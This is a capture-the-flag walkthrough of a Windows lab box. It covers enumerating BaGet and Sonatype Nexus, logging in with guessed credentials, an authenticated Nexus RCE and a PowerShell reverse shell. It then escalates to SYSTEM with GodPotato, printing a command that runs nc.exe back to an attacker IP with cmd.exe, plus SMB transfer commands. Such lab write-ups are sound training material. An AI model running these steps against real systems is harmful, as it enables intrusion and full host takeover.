Target IP: 192.168.120.61 Attacker IP: 192.168.45.246
First we begin with some network discovery
21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds? 8081/tcp open http
Guest account is disabled so we are unable to view RPC and SMB for now.
We try FTP to test anonymous account, we get an error 534 for SSL
We will continue to the two http services hosted on port 80 and 8081 https://www.exploit-db.com/exploits/49385.
BaGet is running on port 80
Sonatype Nexus Repository Manager is running on port 8081 It looks like the version of this is OSS 3.21.0-05 (weird version name)
It looks like the default credentials to login to Sonatype does not work.
Lets begin with directory enumeration on BaGet. We will run feroxbuster for directory traversing and we will try either gobuster or ffuf for subdomain enumeration.
It looks like our scan is falling short on BaGet, lets pivot over to Sonatype.
Sonatype comes up with some directories in Feroxbuster.
They are not very helpful however
If we can find the credentials to Sonatype Nexus Repository manager, I did find some exploits
This RCE might be able to work, but we need to be authenticated: https://www.exploit-db.com/exploits/49385
We get in with credentials nexus.
We could of done some brute forcing, but here are some things to keep in mind:
The login form encodes the user and password fields to base 64. We would have to utilize Hydra and some form of base64 encoding with those fields to be able to submit, else, it would not work.
Usually on these boxes, the passwords will be fairly simple so to go that far would be unlikely but it is good to practice and know how to do this.
The script we obtain from exploit-db works.
We just had to make a few edits to the target ip, as well as the command being executed.
We used an encoded Powershell Base64 script we generated from revshells.
We set a netcat listener and tap in.
We have access as user account Nathan. Lets now investigate and see how we can preform priv esc.
We transfer winPEAS first to do a quick scan
impacket-smbserver share . -smb2support net use \192.168.45.246\share copy \192.168.45.246\share\winPEASx64.exe \winPEASx64.exe
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege is enabled for Nathan
We can priv esc using Potato or PrintSpoofer
We will do the PrintSpoofer exploit. We will transfer this to our target via our share and then execute it.
Printspoofer did not work.
We use GodPotato instead and set up a rev shell which works.
.\GodPotato-NET4.exe -cmd “C:\Users\nathan\Documents\nc.exe 192.168.45.246 1234 -e cmd.exe”
From there we have SYSTEM access and we can access the last flag we need.